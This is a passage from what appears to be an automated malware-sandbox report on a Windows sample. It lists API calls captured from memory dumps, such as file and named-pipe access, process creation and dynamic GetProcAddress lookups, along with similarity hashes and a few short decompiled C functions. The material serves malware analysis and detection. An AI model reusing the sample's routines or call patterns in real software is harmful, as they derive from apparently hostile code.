                                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578EDD
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578EFF
                                                            • GetLastError.KERNEL32(?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578F13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                            • String ID:
                                                            • API String ID: 3370347312-0
                                                            • Opcode ID: 8d01fd5cfba55b573bd17300b725f55e985334df622eaf6ed5082f7801b4080d
                                                            • Instruction ID: ff582cc569dd974517e9bc742664bafcbd810cafb6d50b2f47be94b36d66c317
                                                            • Opcode Fuzzy Hash: 8d01fd5cfba55b573bd17300b725f55e985334df622eaf6ed5082f7801b4080d
                                                            • Instruction Fuzzy Hash: BCF08C31604205BBDB212E60AC0DF9A3A26FB05710F100428F612A90E0EB75B924BF69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(0458C000,00000000), ref: 0458013E
                                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04580159
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04580182
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 045801A3
                                                              • Part of subcall function 045742B4: SetEvent.KERNEL32(?,?,0456E0E1), ref: 045742C9
                                                              • Part of subcall function 045742B4: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0456E0E1), ref: 045742E9
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(00000000,?,0456E0E1), ref: 045742F2
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(?,?,?,0456E0E1), ref: 045742FC
                                                              • Part of subcall function 045742B4: RtlEnterCriticalSection.NTDLL(?), ref: 04574304
                                                              • Part of subcall function 045742B4: RtlLeaveCriticalSection.NTDLL(?), ref: 0457431C
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(?), ref: 04574338
                                                              • Part of subcall function 045742B4: LocalFree.KERNEL32(?), ref: 04574343
                                                              • Part of subcall function 045742B4: RtlDeleteCriticalSection.NTDLL(?), ref: 0457434D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                            • String ID:
                                                            • API String ID: 1103286547-0
                                                            • Opcode ID: 21cc1ed9221eb2f756f7a88edf8ee7ff5406719669b1c28d5afdf0f6cfd59834
                                                            • Instruction ID: cab3bc7014714ce2f7e815f102729f394b1479636c22e0d88b3085e0da8bf3f1
                                                            • Opcode Fuzzy Hash: 21cc1ed9221eb2f756f7a88edf8ee7ff5406719669b1c28d5afdf0f6cfd59834
                                                            • Instruction Fuzzy Hash: F1F0A431740311EBE6312B61EC0DF4A3B59FB85B65F05101CF604BA2C0DD68AC0DFA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04579232,000000FF,049BA7F0,?,?,04581784,0000003A,049BA7F0), ref: 045772C2
                                                            • GetLastError.KERNEL32(?,?,04581784,0000003A,049BA7F0,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045772CD
                                                            • WaitNamedPipeA.KERNEL32(00002710), ref: 045772EF
                                                            • WaitForSingleObject.KERNEL32(00000000,?,?,04581784,0000003A,049BA7F0,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD), ref: 045772FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                            • String ID:
                                                            • API String ID: 4211439915-0
                                                            • Opcode ID: 32cf4f6b7cd4d631b987df528f6c017d22aee37b7624943141dfb0567fe06771
                                                            • Instruction ID: a6fb9ca4948ed6391d599c36397a66d9d048d11b6431dfae451cf95f02c526e8
                                                            • Opcode Fuzzy Hash: 32cf4f6b7cd4d631b987df528f6c017d22aee37b7624943141dfb0567fe06771
                                                            • Instruction Fuzzy Hash: 93F06D32605520EBDB211A78FC8CB5A7F55FB097A1F115536FE19F6190CA252C44FAA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,04561C68), ref: 04581ADB
                                                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04581AF0
                                                            • wsprintfA.USER32 ref: 04581B0C
                                                              • Part of subcall function 0457A976: memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 0457A976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                              • Part of subcall function 0457A976: wcstombs.NTDLL ref: 0457A9CE
                                                              • Part of subcall function 0457A976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 0457A9FF
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA2B
                                                              • Part of subcall function 0457A976: TerminateProcess.KERNEL32(?,000003E5), ref: 0457AA41
                                                              • Part of subcall function 0457A976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04581B1D), ref: 0457AA55
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA88
                                                              • Part of subcall function 0457A976: CloseHandle.KERNEL32(?), ref: 0457AA8D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04581B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                            • String ID:
                                                            • API String ID: 1624158581-0
                                                            • Opcode ID: 7a5570f0b3cb6943e8a53514f82562a0b9f3ce991d9dd4d7d81884c49937dd17
                                                            • Instruction ID: ff5b0cd353b2b72a70faa56f3ff598279383ea298a1012725cfb1e4897f8c95d
                                                            • Opcode Fuzzy Hash: 7a5570f0b3cb6943e8a53514f82562a0b9f3ce991d9dd4d7d81884c49937dd17
                                                            • Instruction Fuzzy Hash: CAF09032600111ABC221162ABC08F5B3AADFFC2761F151128F501F6292DE28DC5AAA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04563C6A
                                                            • Sleep.KERNEL32(0000000A,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04563C74
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04563C9C
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04563CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 20f34a8ae6e674ef9aa0a0450a9f1a15acf65b8cad27e419fdf19de15f69002a
                                                            • Instruction ID: edf7a33dcc13bc149d7a0291e2a8f7487a4835fcf7957a7208efa7d8679b183b
                                                            • Opcode Fuzzy Hash: 20f34a8ae6e674ef9aa0a0450a9f1a15acf65b8cad27e419fdf19de15f69002a
                                                            • Instruction Fuzzy Hash: 71F0B774201241DBE7219B66E848F1A3BA8FF11745F549408F846EB292CE28EC58FA25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD38BC() {
                                                            				void* _t1;
                                                            				intOrPtr _t5;
                                                            				void* _t6;
                                                            				void* _t7;
                                                            				void* _t11;
                                                            
                                                            				_t1 =  *0xdda2c4; // 0x24c
                                                            				if(_t1 == 0) {
                                                            					L8:
                                                            					return 0;
                                                            				}
                                                            				SetEvent(_t1);
                                                            				_t11 = 0x7fffffff;
                                                            				while(1) {
                                                            					SleepEx(0x64, 1);
                                                            					_t5 =  *0xdda308; // 0x0
                                                            					if(_t5 == 0) {
                                                            						break;
                                                            					}
                                                            					_t11 = _t11 - 0x64;
                                                            					if(_t11 > 0) {
                                                            						continue;
                                                            					}
                                                            					break;
                                                            				}
                                                            				_t6 =  *0xdda2c4; // 0x24c
                                                            				if(_t6 != 0) {
                                                            					CloseHandle(_t6);
                                                            				}
                                                            				_t7 =  *0xdda290; // 0x35d0000
                                                            				if(_t7 != 0) {
                                                            					HeapDestroy(_t7);
                                                            				}
                                                            				goto L8;
                                                             			}

                                                            APIs
                                                            • SetEvent.KERNEL32(0000024C,00000001,00DD699F), ref: 00DD38C7
                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 00DD38D6
                                                            • CloseHandle.KERNEL32(0000024C), ref: 00DD38F7
                                                            • HeapDestroy.KERNEL32(035D0000), ref: 00DD3907
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseDestroyEventHandleHeapSleep
                                                            • String ID:
                                                            • API String ID: 4109453060-0
                                                            • Opcode ID: aa89585bfa43f4e13cd714ef317ab011e3b63c159bed3dc758120e142fafd108
                                                            • Instruction ID: 80798f6e05e4979ebfa990fbc3d4117020e71963c277dd6dd68b2db4dc1ea5c3
                                                            • Opcode Fuzzy Hash: aa89585bfa43f4e13cd714ef317ab011e3b63c159bed3dc758120e142fafd108
                                                            • Instruction Fuzzy Hash: FCF01535B433159BDB20AB79BD58F567BACAB04B61B094112B804E33A4CA26C9049AB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E00DD25ED(void** __esi) {
                                                            				intOrPtr _v0;
                                                            				intOrPtr _t4;
                                                            				intOrPtr _t6;
                                                            				void* _t8;
                                                            				intOrPtr _t10;
                                                            				void* _t11;
                                                            				void** _t13;
                                                            
                                                            				_t13 = __esi;
                                                            				_t4 =  *0xdda37c; // 0x39c9630
                                                            				__imp__(_t4 + 0x40);
                                                            				while(1) {
                                                            					_t6 =  *0xdda37c; // 0x39c9630
                                                            					_t1 = _t6 + 0x58; // 0x0
                                                            					if( *_t1 == 0) {
                                                            						break;
                                                            					}
                                                            					Sleep(0xa);
                                                            				}
                                                            				_t8 =  *_t13;
                                                            				if(_t8 != 0 && _t8 != 0xdda030) {
                                                            					HeapFree( *0xdda290, 0, _t8);
                                                            				}
                                                            				_t13[1] = E00DD6BD2(_v0, _t13);
                                                            				_t10 =  *0xdda37c; // 0x39c9630
                                                            				_t11 = _t10 + 0x40;
                                                            				__imp__(_t11);
                                                            				return _t11;
                                                             			}

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD25F6
                                                            • Sleep.KERNEL32(0000000A,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2600
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2628
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD2644
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 475578895b0e2f559986d7afec8d75c92e152a73d6d53735abde0dc7875b8c07
                                                            • Instruction ID: c880c1a399b356ab555ce364d7dfc0b3c9338e29ac29b314bb698125c4c126a9
                                                            • Opcode Fuzzy Hash: 475578895b0e2f559986d7afec8d75c92e152a73d6d53735abde0dc7875b8c07
                                                            • Instruction Fuzzy Hash: 75F0F870206340ABE7219F6DED49F267BA5EF14740B088417F596D6371C631E850DB36
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04570FFA
                                                            • Sleep.KERNEL32(0000000A,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04571004
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04571032
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04571047
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: f1b6bd92b9136e3d595a0528bd2d1dbd981ae65193793874bb2b9df32f944dd8
                                                            • Instruction ID: 490726e54d41dc7d0a36c4b11dcb7021e692b2fef7d10f31a4334f818c667cd4
                                                            • Opcode Fuzzy Hash: f1b6bd92b9136e3d595a0528bd2d1dbd981ae65193793874bb2b9df32f944dd8
                                                            • Instruction Fuzzy Hash: 91F0B274201240DBE7198B64E899F2937A4FB04705F54502DE846AB391DA38EC08FA25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00DD1000() {
                                                            				void* _v0;
                                                            				void** _t3;
                                                            				void** _t5;
                                                            				void** _t7;
                                                            				void** _t8;
                                                            				void* _t10;
                                                            
                                                            				_t3 =  *0xdda37c; // 0x39c9630
                                                            				__imp__( &(_t3[0x10]));
                                                            				while(1) {
                                                            					_t5 =  *0xdda37c; // 0x39c9630
                                                            					_t1 =  &(_t5[0x16]); // 0x0
                                                            					if( *_t1 == 0) {
                                                            						break;
                                                            					}
                                                            					Sleep(0xa);
                                                            				}
                                                            				_t7 =  *0xdda37c; // 0x39c9630
                                                            				_t10 =  *_t7;
                                                            				if(_t10 != 0 && _t10 != 0xddb85e) {
                                                            					HeapFree( *0xdda290, 0, _t10);
                                                            					_t7 =  *0xdda37c; // 0x39c9630
                                                            				}
                                                            				 *_t7 = _v0;
                                                            				_t8 =  &(_t7[0x10]);
                                                            				__imp__(_t8);
                                                            				return _t8;
                                                            			}

                                                            0x00dd1000
                                                            0x00dd1009
                                                            0x00dd1019
                                                            0x00dd1019
                                                            0x00dd101e
                                                            0x00dd1023
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd1013
                                                            0x00dd1013
                                                            0x00dd1025
                                                            0x00dd102a
                                                            0x00dd102e
                                                            0x00dd1041
                                                            0x00dd1047
                                                            0x00dd1047
                                                            0x00dd1050
                                                            0x00dd1052
                                                            0x00dd1056
                                                            0x00dd105c

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD1009
                                                            • Sleep.KERNEL32(0000000A,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD1013
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00DD5FAE,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD1041
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD1056
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 27570890a41bdabff20c3a18e9cf9eb9fa021c5f8f147046f9ee67989e98c2f1
                                                            • Instruction ID: feab78eb4268e47c8b2a9eff57b28f4c7aa1e10a0db767962510c45f96d6a959
                                                            • Opcode Fuzzy Hash: 27570890a41bdabff20c3a18e9cf9eb9fa021c5f8f147046f9ee67989e98c2f1
                                                            • Instruction Fuzzy Hash: 79F09E78242340EFE718EF69ED99A3577A5EB48701B05801BE906D7375C735EC80DA35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,?,?), ref: 0457868E
                                                            • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 045786A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 0x
                                                            • API String ID: 3510742995-3225541890
                                                            • Opcode ID: 714db011c64913f08e31f715f9e7bbcc3f27cd59ac048c2d6d08957a3ae054f3
                                                            • Instruction ID: fd82e6e14e1eb08a792fe001e415160173b8e4a3544dd5a5ff76de67876f1af7
                                                            • Opcode Fuzzy Hash: 714db011c64913f08e31f715f9e7bbcc3f27cd59ac048c2d6d08957a3ae054f3
                                                            • Instruction Fuzzy Hash: E8017135900219BBDB01EFA8D849AEEBBB9FB54308F144465E914F7210EB74EA09DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,04582C28,00000800,?,?,00000000,00000000), ref: 045798DD
                                                              • Part of subcall function 0456F7AF: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,045797AB,?,?,?,00000000,00000000), ref: 0456F7D4
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F7F6
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F80C
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F822
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F838
                                                              • Part of subcall function 0456F7AF: GetProcAddress.KERNEL32(00000000,?), ref: 0456F84E
                                                              • Part of subcall function 045685E6: memcpy.NTDLL(?,?,?,?,?,?,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 0456864C
                                                              • Part of subcall function 045685E6: memcpy.NTDLL(00000000,?,?), ref: 045686AB
                                                            • memcpy.NTDLL(?,?,?,?,?,0456DC59,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 0457980A
                                                            • memcpy.NTDLL(?,?,00000018,?,?,0456DC59,0456DC59,0456DC59,?,?,?,00000000,00000000), ref: 04579856
                                                            • memset.NTDLL ref: 0457995D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcmemcpy$HandleModulememset
                                                            • String ID:
                                                            • API String ID: 2847270571-0
                                                            • Opcode ID: aec84ed5c803cd860d6d2780bc6314a8cbf2fbb2cec9febdc4d9a94fc6f83ea3
                                                            • Instruction ID: 61bde88a917c5f9869fd2568daccd039359193edb192574c384b59b0b1188001
                                                            • Opcode Fuzzy Hash: aec84ed5c803cd860d6d2780bc6314a8cbf2fbb2cec9febdc4d9a94fc6f83ea3
                                                            • Instruction Fuzzy Hash: DD913FB190020AEFEF11DF98E984AAEB7B5FF04304F144569E811A7251E735BA54EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04561DD6
                                                            • CloseHandle.KERNEL32(?,?,00000100,?,?), ref: 04561E24
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000094,045671A5,00000000,?,04561D00,00000000,?,0456B6F6,00000000,?,0456A4A1,00000000), ref: 04562168
                                                            • GetLastError.KERNEL32(?,?), ref: 045623AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 2333114656-0
                                                            • Opcode ID: d22b62b3312275fd6a619e3cbe0a7f0443162ec908890f0e9c75b3a1dc7f58ed
                                                            • Instruction ID: 206019c549d5bdf094aa807def705eb5662e0419dd7d04120dd340891aac2723
                                                            • Opcode Fuzzy Hash: d22b62b3312275fd6a619e3cbe0a7f0443162ec908890f0e9c75b3a1dc7f58ed
                                                            • Instruction Fuzzy Hash: 5B412532304205FAEB217E69DC45FAB3B79BB84754F0044A2B903A7140EB71F951BBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 0457764F
                                                            • memcpy.NTDLL ref: 04577677
                                                              • Part of subcall function 04564173: RtlNtStatusToDosError.NTDLL(00000000), ref: 045641AB
                                                              • Part of subcall function 04564173: SetLastError.KERNEL32(00000000), ref: 045641B2
                                                            • GetLastError.KERNEL32(00000010,00000218,04584EAD,00000100,?,00000318,00000008), ref: 0457768E
                                                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04584EAD,00000100), ref: 04577771
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$Last$Statusmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1706616652-0
                                                            • Opcode ID: 3d10bb9ffbb63cd0152efac715006565da4ff4d0131f6c5ff71b533f035f28e2
                                                            • Instruction ID: d721ef96f461bac33edc09516f140d36b6fd11765abc880135376f4786452b00
                                                            • Opcode Fuzzy Hash: 3d10bb9ffbb63cd0152efac715006565da4ff4d0131f6c5ff71b533f035f28e2
                                                            • Instruction Fuzzy Hash: 0D4162B1504302AFD760EF28ED41FABB7E9BB88314F00492DF599D6250EB70F5149BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0456A27C: lstrlen.KERNEL32(00000000,?,?), ref: 0456A2D5
                                                              • Part of subcall function 0456A27C: lstrlen.KERNEL32(?,?,?), ref: 0456A2F3
                                                              • Part of subcall function 0456A27C: RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 0456A31C
                                                              • Part of subcall function 0456A27C: memcpy.NTDLL(00000000,00000000,00000000), ref: 0456A333
                                                              • Part of subcall function 0456A27C: HeapFree.KERNEL32(00000000,00000000), ref: 0456A346
                                                              • Part of subcall function 0456A27C: memcpy.NTDLL(00000000,?,?), ref: 0456A355
                                                            • GetLastError.KERNEL32 ref: 045739E4
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567306
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 0456732A
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567338
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04573A00
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04573A11
                                                            • SetLastError.KERNEL32(00000000), ref: 04573A14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                            • String ID:
                                                            • API String ID: 2451549186-0
                                                            • Opcode ID: 3242239ad62c3d05afcae014f73c806502ba88ea274b7f1de94905c710b37c5d
                                                            • Instruction ID: 7adf0023e1ddd9463f53ce237e3d403e9de51a21cab796a778b6bfceef66bd97
                                                            • Opcode Fuzzy Hash: 3242239ad62c3d05afcae014f73c806502ba88ea274b7f1de94905c710b37c5d
                                                            • Instruction Fuzzy Hash: F5312B31900109FFCF129F99E84089EBFB9FF84764B10416AF916A2161C736AA51FF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0457BDCC: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?), ref: 0457BDF0
                                                              • Part of subcall function 0457BDCC: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457BE02
                                                              • Part of subcall function 0457BDCC: wcstombs.NTDLL ref: 0457BE10
                                                              • Part of subcall function 0457BDCC: lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE34
                                                              • Part of subcall function 0457BDCC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457BE49
                                                              • Part of subcall function 0457BDCC: mbstowcs.NTDLL ref: 0457BE56
                                                              • Part of subcall function 0457BDCC: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE68
                                                              • Part of subcall function 0457BDCC: HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE82
                                                            • GetLastError.KERNEL32 ref: 0457A368
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567306
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 0456732A
                                                              • Part of subcall function 04567254: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000,0458C140), ref: 04567338
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A384
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A395
                                                            • SetLastError.KERNEL32(00000000), ref: 0457A398
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 3867366388-0
                                                            • Opcode ID: 4b3bd0a9892c9fcd66b4e05c02a7b0bc1638316a4ef3cfc9d8c1ddafe1af121c
                                                            • Instruction ID: 01d0c472339a2728729cb80d945c712a7e6e2627dc6ee67119db290c57448417
                                                            • Opcode Fuzzy Hash: 4b3bd0a9892c9fcd66b4e05c02a7b0bc1638316a4ef3cfc9d8c1ddafe1af121c
                                                            • Instruction Fuzzy Hash: 9D314932900108FFCF129FA9EC4089EBFB9FF48310B14416AF915A6161CB35AE61EF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: b0c542d6bd1a6fdc8c9b01d283d2f5f2ab0c507d3e6c40ff4af7d90c3437e17f
                                                            • Instruction ID: 664ec23000ef09d77887918f76c0f5d58c628c3781e485311fa659375ebd17f8
                                                            • Opcode Fuzzy Hash: b0c542d6bd1a6fdc8c9b01d283d2f5f2ab0c507d3e6c40ff4af7d90c3437e17f
                                                            • Instruction Fuzzy Hash: AE21A2B260050ABBDB219F61FC84A667B39FF09318B040529ED4697C11D732F8B1EBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A), ref: 04575CF4
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 045845A5: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,04575D22,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60), ref: 045845B3
